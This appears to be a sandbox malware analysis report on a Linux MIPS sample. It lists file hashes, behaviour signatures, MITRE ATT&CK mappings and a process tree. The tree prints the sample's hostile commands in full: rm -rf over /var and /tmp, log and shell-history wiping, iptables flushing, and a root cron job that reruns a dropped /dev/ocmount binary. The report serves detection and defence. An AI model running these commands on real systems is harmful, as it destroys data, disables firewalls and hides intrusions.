Analysis
-
max time kernel
124s -
max time network
145s -
platform
debian-12_mipsel -
resource
debian12-mipsel-20240221-en -
resource tags
-
submitted
09/09/2024, 07:20
General
-
Target
e1ea6171d536940ef7aad083c74d1da7
-
Size
159KB
-
MD5
e1ea6171d536940ef7aad083c74d1da7
-
SHA1
d5ae198f421ee674b8700e77ae425224f930165c
-
SHA256
2fb2ff7d04083b59772d38fc551e6ea15199587b373e3ce3ceddc68b0db17ee6
-
SHA512
cc3033f732ceb61fecefd46e174d608e66164dd86d8c7889f029be2583689e35ce5af1fdfd9a7caf2200f08b2b2a94a1dc85bcf6df4e0a971fefde54ed2d40fb
-
SSDEEP
3072:JZoDOcH7TvwfmIN+Fj93W0Quyma9TFUqX6etJ:ADOcbTfyuVQuyma9FpJ
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 2 IoCs
Adversaries may modify file or directory permissions to evade defenses.
-
Deletes Audit logs 1 TTPs 1 IoCs
Deletes logs related to the Linux Audit framework.
-
Deletes journal logs 1 TTPs 3 IoCs
Deletes systemd journal logs. Likely to evade detection.
-
Executes dropped EXE 1 IoCs
-
Flushes firewall rules 2 IoCs
Flushes/ disables firewall rules inside the Linux kernel.
-
Modifies Watchdog functionality 1 TTPs 2 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
-
Abuse Elevation Control Mechanism: Sudo and Sudo Caching 1 TTPs 1 IoCs
Abuse sudo or cached sudo credentials to execute code.
-
Checks mountinfo of local process 1 TTPs 4 IoCs
Checks mountinfo of running processes which indicate if it is running in chroot jail.
-
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
-
Deletes log files 1 TTPs 29 IoCs
Deletes log files on the system.
-
Enumerates running processes
Discovers information about currently running processes on the system
-
Changes its process name 4 IoCs
-
Reads CPU attributes 1 TTPs 3 IoCs
-
Enumerates kernel/hardware configuration 1 TTPs 3 IoCs
Reads contents of /sys virtual filesystem to enumerate system information.
-
Reads runtime system information 64 IoCs
Reads data from /proc virtual filesystem.
-
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/e1ea6171d536940ef7aad083c74d1da7/tmp/e1ea6171d536940ef7aad083c74d1da71⤵
- Modifies Watchdog functionality
- Changes its process name
- Writes file to tmp directory
-
/bin/shsh -c "rm -rf /tmp/* /var/* /var/run/* /var/tmp/* /var/log/wtmp"2⤵
-
/usr/bin/rmrm -rf /tmp/e1ea6171d536940ef7aad083c74d1da7 /tmp/systemd-private-a7348637f53f45fea68078114135298e-systemd-logind.service-2DNFXr /tmp/systemd-private-a7348637f53f45fea68078114135298e-systemd-timedated.service-qBy5Pz /var/backups /var/cache /var/lib /var/local /var/lock /var/log /var/mail /var/opt /var/run /var/spool /var/tmp /var/run/atd.pid /var/run/auditd.pid /var/run/console-setup /var/run/credentials /var/run/crond.pid /var/run/crond.reboot /var/run/dbus /var/run/dhclient.enp0s19.pid /var/run/exim4 /var/run/initctl /var/run/initramfs /var/run/lock /var/run/log /var/run/motd.dynamic /var/run/mount /var/run/network /var/run/sendsigs.omit.d /var/run/shm /var/run/sshd /var/run/sshd.pid /var/run/sudo /var/run/systemd /var/run/tmpfiles.d /var/run/udev /var/run/user /var/run/utmp /var/tmp/systemd-private-a7348637f53f45fea68078114135298e-systemd-logind.service-oTLUn1 /var/tmp/systemd-private-a7348637f53f45fea68078114135298e-systemd-timedated.service-ZTMgGN /var/log/wtmp3⤵
- Deletes Audit logs
- Deletes journal logs
- Abuse Elevation Control Mechanism: Sudo and Sudo Caching
- Deletes log files
-
-
-
/bin/shsh -c "rm -rf /tmp/*"2⤵
-
/usr/bin/rmrm -rf "/tmp/*"3⤵
-
-
-
/bin/shsh -c "iptables -F"2⤵
-
-
/bin/shsh -c "pkill -9 busybox"2⤵
-
/usr/bin/pkillpkill -9 busybox3⤵
- Reads CPU attributes
- Enumerates kernel/hardware configuration
- Reads runtime system information
-
-
-
/bin/shsh -c "pkill -9 perl"2⤵
-
/usr/bin/pkillpkill -9 perl3⤵
- Reads CPU attributes
- Enumerates kernel/hardware configuration
- Reads runtime system information
-
-
-
/bin/shsh -c "pkill -9 python"2⤵
-
/usr/bin/pkillpkill -9 python3⤵
- Reads CPU attributes
- Enumerates kernel/hardware configuration
- Reads runtime system information
-
-
-
/bin/shsh -c "service iptables stop"2⤵
-
/usr/sbin/serviceservice iptables stop3⤵
-
/usr/bin/basenamebasename /usr/sbin/service4⤵
-
-
/usr/bin/basenamebasename /usr/sbin/service4⤵
-
-
/usr/bin/sedsed -ne "s/\\.socket\\s*[a-z]*\\s*\$/.socket/p"4⤵
-
-
/usr/bin/systemctlsystemctl list-unit-files --full "--type=socket"4⤵
-
-
-
/usr/local/sbin/systemctlsystemctl stop iptables.service3⤵
-
-
/usr/local/bin/systemctlsystemctl stop iptables.service3⤵
-
-
/usr/sbin/systemctlsystemctl stop iptables.service3⤵
-
-
/usr/bin/systemctlsystemctl stop iptables.service3⤵
-
-
-
/bin/shsh -c "/sbin/iptables -F; /sbin/iptables -X"2⤵
-
/sbin/iptables/sbin/iptables -F3⤵
- Flushes firewall rules
-
-
/sbin/iptables/sbin/iptables -X3⤵
- Flushes firewall rules
-
-
-
/bin/shsh -c "service firewall stop"2⤵
-
/usr/sbin/serviceservice firewall stop3⤵
-
/usr/bin/basenamebasename /usr/sbin/service4⤵
-
-
/usr/bin/basenamebasename /usr/sbin/service4⤵
-
-
/usr/bin/systemctlsystemctl list-unit-files --full "--type=socket"4⤵
-
-
/usr/bin/sedsed -ne "s/\\.socket\\s*[a-z]*\\s*\$/.socket/p"4⤵
-
-
-
/usr/local/sbin/systemctlsystemctl stop firewall.service3⤵
-
-
/usr/local/bin/systemctlsystemctl stop firewall.service3⤵
-
-
/usr/sbin/systemctlsystemctl stop firewall.service3⤵
-
-
/usr/bin/systemctlsystemctl stop firewall.service3⤵
-
-
-
/bin/shsh -c "history -c"2⤵
-
-
/bin/shsh -c "rm -rf ~/.bash_history"2⤵
-
/usr/bin/rmrm -rf "~/.bash_history"3⤵
-
-
-
/bin/shsh -c "history -w"2⤵
-
-
/bin/shsh -c "chmod +x /dev/ocmount"2⤵
- File and Directory Permissions Modification
-
/usr/bin/chmodchmod +x /dev/ocmount3⤵
- File and Directory Permissions Modification
-
-
-
/bin/shsh -c "echo '* * * * * root /bin/bash /dev/ocmount' > /etc/cron.d/mount.sh"2⤵
- Creates/modifies Cron job
-
-
/bin/shsh -c /dev/ocmount2⤵
-
/dev/ocmount/dev/ocmount3⤵
- Executes dropped EXE
-
/usr/bin/catcat /proc/823/mountinfo4⤵
- Checks mountinfo of local process
-
-
/usr/bin/grepgrep -o "[0-9]*"4⤵
-
-
/usr/bin/grepgrep -o "/proc/[0-9]*"4⤵
-
-
/usr/bin/grepgrep -o "/proc/[0-9]*"4⤵
-
-
/usr/bin/grepgrep -o "[0-9]*"4⤵
-
-
/usr/bin/sleepsleep 304⤵
-
-
/usr/bin/catcat /proc/823/mountinfo4⤵
- Checks mountinfo of local process
-
-
/usr/bin/grepgrep -o "/proc/[0-9]*"4⤵
-
-
/usr/bin/grepgrep -o "[0-9]*"4⤵
- Reads runtime system information
-
-
/usr/bin/grepgrep -o "/proc/[0-9]*"4⤵
-
-
/usr/bin/grepgrep -o "[0-9]*"4⤵
-
-
/usr/bin/sleepsleep 304⤵
-
-
/usr/bin/catcat /proc/823/mountinfo4⤵
- Checks mountinfo of local process
-
-
/usr/bin/grepgrep -o "/proc/[0-9]*"4⤵
-
-
/usr/bin/grepgrep -o "[0-9]*"4⤵
-
-
/usr/bin/grepgrep -o "/proc/[0-9]*"4⤵
-
-
/usr/bin/grepgrep -o "[0-9]*"4⤵
- Reads runtime system information
-
-
/usr/bin/sleepsleep 304⤵
-
-
/usr/bin/catcat /proc/823/mountinfo4⤵
- Checks mountinfo of local process
-
-
/usr/bin/grepgrep -o "/proc/[0-9]*"4⤵
-
-
/usr/bin/grepgrep -o "[0-9]*"4⤵
-
-
/usr/bin/grepgrep -o "/proc/[0-9]*"4⤵
- Reads runtime system information
-
-
/usr/bin/grepgrep -o "[0-9]*"4⤵
-
-
/usr/bin/sleepsleep 304⤵
-
-
-
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Abuse Elevation Control Mechanism
1Sudo and Sudo Caching
1Scheduled Task/Job
1Cron
1Defense Evasion
Abuse Elevation Control Mechanism
1Sudo and Sudo Caching
1File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Impair Defenses
1Indicator Removal
3Clear Linux or Mac System Logs
3Virtualization/Sandbox Evasion
1System Checks
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
479B
MD5a3fc64b86b20a7b2eaa9330e1064d1f1
SHA13a6f294c550a578d5e337f67fd4d9c1984eea885
SHA2566029dd069bc913653eec32e54fb005a80fb71ebb5f0a584c71e06ac08fbbece6
SHA512ce26f2c6ecec049b7053008e323018ec8a709942a456464a1d423f80b92bca410d9b0f661093eb732254e6690900ac9a15b6f62450f72e6511195aee403c50b6
-
Filesize
38B
MD567ec4a157e5b63970cfbb8cc55883ad7
SHA15262b8c108dc3aef69fca6ffd959893de852dc67
SHA2560cb3cc915bb7492ff579f2b59237a5899088e5c5f238125ac9f0b5f73d2723e7
SHA512eb6310992dc6e3ac1fca2bcf26d82365494aa0adbd80ee5ec6231b2418d1daf6608f7820a560b4fbda8c8885a59f8a82ca86aaa481f254d207926c1f6c5802b9